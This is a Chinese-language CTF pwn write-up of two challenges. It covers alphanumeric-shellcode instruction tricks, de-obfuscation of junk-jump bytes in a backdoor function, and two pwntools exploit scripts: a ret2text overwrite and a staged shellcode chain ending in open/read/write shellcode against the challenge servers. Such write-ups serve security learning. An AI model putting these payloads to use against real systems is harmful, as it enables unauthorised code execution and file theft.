首页 CTF Pwn Game

# Jmp / 花指令 / ShellCode / 立即数

Pwner: 4riH04X

t1d 在愚人节出的题,师傅精力就是好啊,我都不敢想他出这个题算偏移有多累。

很有愚人节的感觉,在师傅的一些旁敲侧击下也是学到了很多 re 的知识。

# 1.nmsl

# 【Done】ret2text

# 1. 立即数作用

pwn 题目运行 shellcode,一般是采用寄存器跳转,即 jmp rax 此类,那么其实可以通过跳转寄存器获取 shellcode 存放地址,并且将 /bin/sh 直接镶入 shellcode 后面,简化 shellcode 书写。

同时,有些题目会对 shellcode 有所限制,限制只能包含可打印字符或者纯粹字母数字。这就限制了 shellcode 的书写, movsyscall 都会遭到限制, 可用指令如下:

材料
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
1.数据传送:
push/pop eax…
pusha/popa

2.算术运算:
inc/dec eax…
sub al, 立即数
sub byte ptr [eax… + 立即数], al dl…
sub byte ptr [eax… + 立即数], ah dh…
sub dword ptr [eax… + 立即数], esi edi
sub word ptr [eax… + 立即数], si di
sub al dl…, byte ptr [eax… + 立即数]
sub ah dh…, byte ptr [eax… + 立即数]
sub esi edi, dword ptr [eax… + 立即数]
sub si di, word ptr [eax… + 立即数]

3.逻辑运算:
and al, 立即数
and dword ptr [eax… + 立即数], esi edi
and word ptr [eax… + 立即数], si di
and ah dh…, byte ptr [ecx edx… + 立即数]
and esi edi, dword ptr [eax… + 立即数]
and si di, word ptr [eax… + 立即数]

xor al, 立即数
xor byte ptr [eax… + 立即数], al dl…
xor byte ptr [eax… + 立即数], ah dh…
xor dword ptr [eax… + 立即数], esi edi
xor word ptr [eax… + 立即数], si di
xor al dl…, byte ptr [eax… + 立即数]
xor ah dh…, byte ptr [eax… + 立即数]
xor esi edi, dword ptr [eax… + 立即数]
xor si di, word ptr [eax… + 立即数]

4.比较指令:
cmp al, 立即数
cmp byte ptr [eax… + 立即数], al dl…
cmp byte ptr [eax… + 立即数], ah dh…
cmp dword ptr [eax… + 立即数], esi edi
cmp word ptr [eax… + 立即数], si di
cmp al dl…, byte ptr [eax… + 立即数]
cmp ah dh…, byte ptr [eax… + 立即数]
cmp esi edi, dword ptr [eax… + 立即数]
cmp si di, word ptr [eax… + 立即数]

5.转移指令:
push 56h
pop eax
cmp al, 43h
jnz lable

<=> jmp lable

6.交换al, ah
push eax
xor ah, byte ptr [esp] // ah ^= al
xor byte ptr [esp], ah // al ^= ah
xor ah, byte ptr [esp] // ah ^= al
pop eax

7.清零:
push 44h
pop eax
sub al, 44h ; eax = 0

push esi
push esp
pop eax
xor [eax], esi ; esi = 0

# 2. 代码混淆

backdoor, 这是混淆过的,但 EB 是 jmp 的机器码,我们尝试手动去除花指令。

源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
.text:0000000000401D45                ; __int64 __fastcall sub_401D45(__int64)
.text:0000000000401D45                sub_401D45      proc near               ; CODE XREF: sub_401D45+81↓p
.text:0000000000401D45
.text:0000000000401D45                var_8           = qword ptr -8
.text:0000000000401D45
.text:0000000000401D45                ; __unwind {
.text:0000000000401D45 F3 0F 1E FA                    endbr64
.text:0000000000401D49 55                             push    rbp
.text:0000000000401D4A 48 89 E5                       mov     rbp, rsp
.text:0000000000401D4D 48 83 EC 10                    sub     rsp, 10h
.text:0000000000401D51 48 89 7D F8                    mov     [rbp+var_8], rdi
.text:0000000000401D55 48 B8 80 C3 18                 mov     rax, 15EB18C380h
.text:0000000000401D55 EB 15 00 00 00
.text:0000000000401D5F 48 39 45 F8                    cmp     [rbp+var_8], rax
.text:0000000000401D63 75 0A                          jnz     short loc_401D6F
.text:0000000000401D65 B8 00 00 00 00                 mov     eax, 0
.text:0000000000401D6A E9 2A 01 00 00                 jmp     locret_401E99
.text:0000000000401D6F                ; ---------------------------------------------------------------------------
.text:0000000000401D6F
.text:0000000000401D6F                loc_401D6F:                             ; CODE XREF: sub_401D45+1E↑j
.text:0000000000401D6F 48 B8 48 8B 1B                 mov     rax, 0FA1BEB1B8B48h
.text:0000000000401D6F EB 1B FA 00 00
.text:0000000000401D79 48 39 45 F8                    cmp     [rbp+var_8], rax
.text:0000000000401D7D 75 10                          jnz     short loc_401D8F
.text:0000000000401D7F 48 8B 45 F8                    mov     rax, [rbp+var_8]
.text:0000000000401D83 89 C7                          mov     edi, eax
.text:0000000000401D85 E8 9F FF FF FF                 call    sub_401D29
.text:0000000000401D8A E9 05 01 00 00                 jmp     loc_401E94
.text:0000000000401D8F                ; ---------------------------------------------------------------------------
.text:0000000000401D8F
.text:0000000000401D8F                loc_401D8F:                             ; CODE XREF: sub_401D45+38↑j
.text:0000000000401D8F 48 B8 80 C3 0E                 mov     rax, 0FFFF1BEB0EC380h
.text:0000000000401D8F EB 1B FF FF 00
.text:0000000000401D99 48 39 45 F8                    cmp     [rbp+var_8], rax
.text:0000000000401D9D 75 10                          jnz     short loc_401DAF
.text:0000000000401D9F 48 8B 45 F8                    mov     rax, [rbp+var_8]
.text:0000000000401DA3 89 C7                          mov     edi, eax
.text:0000000000401DA5 E8 1F FF FF FF                 call    sub_401CC9
.text:0000000000401DAA E9 E5 00 00 00                 jmp     loc_401E94
.text:0000000000401DAF                ; ---------------------------------------------------------------------------
.text:0000000000401DAF
.text:0000000000401DAF                loc_401DAF:                             ; CODE XREF: sub_401D45+58↑j
.text:0000000000401DAF 48 B8 48 89 DF                 mov     rax, 7F1CEBDF8948h
.text:0000000000401DAF EB 1C 7F 00 00
.text:0000000000401DB9 48 39 45 F8                    cmp     [rbp+var_8], rax
.text:0000000000401DBD 75 11                          jnz     short loc_401DD0
.text:0000000000401DBF 48 8B 45 F8                    mov     rax, [rbp+var_8]
.text:0000000000401DC3 48 89 C7                       mov     rdi, rax
.text:0000000000401DC6 E8 7A FF FF FF                 call    sub_401D45
.text:0000000000401DCB E9 C4 00 00 00                 jmp     loc_401E94
.text:0000000000401DD0                ; ---------------------------------------------------------------------------
.text:0000000000401DD0
.text:0000000000401DD0                loc_401DD0:                             ; CODE XREF: sub_401D45+78↑j
.text:0000000000401DD0 48 B8 80 C3 03                 mov     rax, 1C1BEB03C380h
.text:0000000000401DD0 EB 1B 1C 00 00
.text:0000000000401DDA 48 39 45 F8                    cmp     [rbp+var_8], rax
.text:0000000000401DDE 75 10                          jnz     short loc_401DF0
.text:0000000000401DE0 48 8B 45 F8                    mov     rax, [rbp+var_8]
.text:0000000000401DE4 89 C7                          mov     edi, eax
.text:0000000000401DE6 E8 22 FF FF FF                 call    sub_401D0D
.text:0000000000401DEB E9 A4 00 00 00                 jmp     loc_401E94
.text:0000000000401DF0                ; ---------------------------------------------------------------------------
.text:0000000000401DF0
.text:0000000000401DF0                loc_401DF0:                             ; CODE XREF: sub_401D45+99↑j
.text:0000000000401DF0 48 B8 B1 20 EB                 mov     rax, 7FFF1CEB20B1h
.text:0000000000401DF0 1C FF 7F 00 00
.text:0000000000401DFA 48 39 45 F8                    cmp     [rbp+var_8], rax
.text:0000000000401DFE 75 10                          jnz     short loc_401E10
.text:0000000000401E00 48 8B 45 F8                    mov     rax, [rbp+var_8]
.text:0000000000401E04 89 C7                          mov     edi, eax
.text:0000000000401E06 E8 D0 FE FF FF                 call    sub_401CDB
.text:0000000000401E0B E9 84 00 00 00                 jmp     loc_401E94
.text:0000000000401E10                ; ---------------------------------------------------------------------------
.text:0000000000401E10
.text:0000000000401E10                loc_401E10:                             ; CODE XREF: sub_401D45+B9↑j
.text:0000000000401E10 48 B8 88 0B EB                 mov     rax, 7FFF19EB0B88h
.text:0000000000401E10 19 FF 7F 00 00
.text:0000000000401E1A 48 39 45 F8                    cmp     [rbp+var_8], rax
.text:0000000000401E1E 75 0D                          jnz     short loc_401E2D
.text:0000000000401E20 48 8B 45 F8                    mov     rax, [rbp+var_8]
.text:0000000000401E24 89 C7                          mov     edi, eax
.text:0000000000401E26 E8 87 FE FF FF                 call    sub_401CB2
.text:0000000000401E2B EB 67                          jmp     short loc_401E94
.text:0000000000401E2D                ; ---------------------------------------------------------------------------
.text:0000000000401E2D
.text:0000000000401E2D                loc_401E2D:                             ; CODE XREF: sub_401D45+D9↑j
.text:0000000000401E2D 48 B8 5B 5B EB                 mov     rax, 0FF1FEB5B5Bh
.text:0000000000401E2D 1F FF 00 00 00
.text:0000000000401E37 48 39 45 F8                    cmp     [rbp+var_8], rax
.text:0000000000401E3B 75 13                          jnz     short loc_401E50
.text:0000000000401E3D 48 8B 45 F8                    mov     rax, [rbp+var_8]
.text:0000000000401E41 48 89 C7                       mov     rdi, rax
.text:0000000000401E44 B8 00 00 00 00                 mov     eax, 0
.text:0000000000401E49 E8 4D 00 00 00                 call    sub_401E9B
.text:0000000000401E4E EB 44                          jmp     short loc_401E94

# 3. 后门函数还原

image-20240331112333892

# 4.exp

题解exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import*
#p=remote('124.223.159.125','9023')
context(os = 'linux',arch = 'amd64',log_level = 'debug')
elf=ELF('./pwn')
#libc=ELF("/mnt/hgfs/Ubuntu_share/all_libc/amd64/16libc-2.23.so")
# libc=ELF("/mnt/hgfs/Ubuntu_share/CTF/Pwn/t1d哥哥的push/t1dctf/tag/libc.so.6")
#print(hex(libc.symbols["funlockfile"]))
debug = 1
if debug:
    p = remote('tld1027.com', 9020)
else:
    p = process("./pwn")
    gdb.attach(p)


func_addr = 0x401d57
p.recvuntil(b'Length >')
p.send(b'33\n')
pause()
p.recvuntil(b'Input >')
p.send(b'a'*31 + b'\x57'+b'\x1d')
pause()

p.interactive()

image-20240331110048376

# 2.Faker

# Shellcode/orw

一道会把输入 base64 转码的题(MLM 说是 sha256,导致走了弯路),但测试后加密只会加密一部分,16 个数字加密后发现有 4 个字节不会被加密,

1. 我们可以一开始去凑 jmp 10 这个字节,让加密后为这个指令,中间可以填充无用字节,跳到未加密的 4 个字节。 一次就是 16 个字节

2. 在这未加密的 4 个字节里,完成 rdi,rsi,rdx,rax 的赋值,构造一次新输入。

3. 把输入设置成正在执行的代码块,注入 orw 的 shellcode

这里要注意 main 函数中 close (1),close (2) 文件描述符号后,需要在构造的 read 执行后将 fd:0 也 close 掉,因为这样才能够正确的用文件描述符 3 发挥作用。

题解exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import*
#p=remote('124.223.159.125','9023')
context(os = 'linux',arch = 'amd64',log_level = 'debug')
elf=ELF('./pwn')
#libc=ELF("/mnt/hgfs/Ubuntu_share/all_libc/amd64/16libc-2.23.so")
# libc=ELF("/mnt/hgfs/Ubuntu_share/CTF/Pwn/t1d哥哥的push/t1dctf/tag/libc.so.6")
#print(hex(libc.symbols["funlockfile"]))
debug = 1
if debug:
    p = remote('tld1027.com', 9030)
else:
    p = process("./pwn")
    gdb.attach(p)
payload = b'\xeb\x0c' # jmp 0xe
payload += b'a'* 12 + asm ( "push rdx; pop rsi;")+b'\xeb\x0c'  # rsi = rdx 
payload += b'a'* 12 + asm ( "push rax; pop rdx; ")+ b'\xeb\x0c' # rdx = rax
payload += b'a'* 12 + asm ( "push rax; pop rdi; " )+ b'\xeb\x0c'   # rdi = rax
payload += b'a'* 12 + asm ( "mov dl,0xff; syscall") 
p.recvuntil(b'>')
p.send(payload)
pause()
payload = b'a'* 0x42
payload += asm(shellcraft.close(0))
payload += asm(shellcraft.openat(0, "/home/pwn/flag",0))
payload += asm(shellcraft.read (0,"rbp",0x100))
payload += asm(shellcraft.write(3,"rbp", 0x100))
p.send(payload)
p.interactive()

image-20240402134913499

更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

4riH04X 微信支付

微信支付